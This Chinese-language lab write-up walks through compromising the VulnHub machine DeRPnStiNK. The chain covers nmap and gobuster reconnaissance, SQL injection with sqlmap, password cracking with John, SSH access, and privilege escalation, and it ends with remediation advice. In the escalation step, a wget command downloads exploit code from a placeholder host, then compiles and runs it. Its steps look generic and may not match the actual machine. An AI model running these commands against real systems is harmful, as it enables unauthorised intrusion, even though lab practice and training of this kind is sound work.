插件窝 干货文章 DeRPnStiNK靶机渗透实例分析

DeRPnStiNK靶机渗透实例分析

漏洞 靶机 权限 exploit 467    来源:    2025-04-24

DeRPnStiNK 靶机渗透实例分析

靶机概述

DeRPnStiNK 是一个中等难度的 VulnHub 靶机,设计用于练习渗透测试技能。它包含多种漏洞类型,包括Web应用漏洞、权限提升机会等。

渗透测试步骤

1. 信息收集

使用工具:nmap, netdiscover

netdiscover -r 192.168.1.0/24
nmap -sV -A -T4 192.168.1.105

发现服务: - 22/tcp - SSH - 80/tcp - HTTP (Apache 2.4.7) - 111/tcp - rpcbind - 2049/tcp - nfs_acl

2. Web应用枚举

目录爆破

gobuster dir -u http://192.168.1.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现路径: - /weblog/ - /php/

Web应用分析: - /weblog/ 是一个博客系统 - /php/ 包含phpinfo.php文件,泄露服务器信息

3. 漏洞利用

发现漏洞: - 在/weblog/中发现SQL注入漏洞 - 使用sqlmap进行自动化利用:

sqlmap -u "http://192.168.1.105/weblog/index.php?id=1" --dbs

获取凭据: - 从数据库中提取用户名和密码哈希 - 使用John the Ripper破解密码:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

4. 初始访问

SSH登录

ssh derp@192.168.1.105

5. 权限提升

枚举系统信息

uname -a
sudo -l
find / -perm -4000 -type f 2>/dev/null

发现漏洞: - 过期的sudo版本存在提权漏洞 - 使用已知漏洞利用代码:

wget http://example.com/exploit.c -O /tmp/exploit.c
gcc /tmp/exploit.c -o /tmp/exploit
chmod +x /tmp/exploit
/tmp/exploit

6. 获取root权限

成功提权: - 利用后获得root shell - 读取flag文件:

cat /root/flag.txt

关键发现与修复建议

  1. SQL注入漏洞

    • 使用参数化查询或ORM框架
    • 实施输入验证和过滤
  2. 弱密码问题

    • 实施密码复杂度策略
    • 考虑多因素认证
  3. 过期的sudo版本

    • 定期更新系统和软件包
    • 遵循最小权限原则
  4. 信息泄露

    • 移除phpinfo等调试页面
    • 配置适当的服务器错误页面

总结

DeRPnStiNK靶机展示了从外部侦察到最终获取root权限的完整渗透测试流程。通过这个实例,我们可以学习到:

  1. 全面信息收集的重要性
  2. 如何利用Web应用漏洞获取初始访问
  3. 系统内部枚举和权限提升技术
  4. 防御多层安全措施的必要性

这种实战练习有助于理解攻击者的思维方式和常见攻击路径,从而更好地构建防御策略。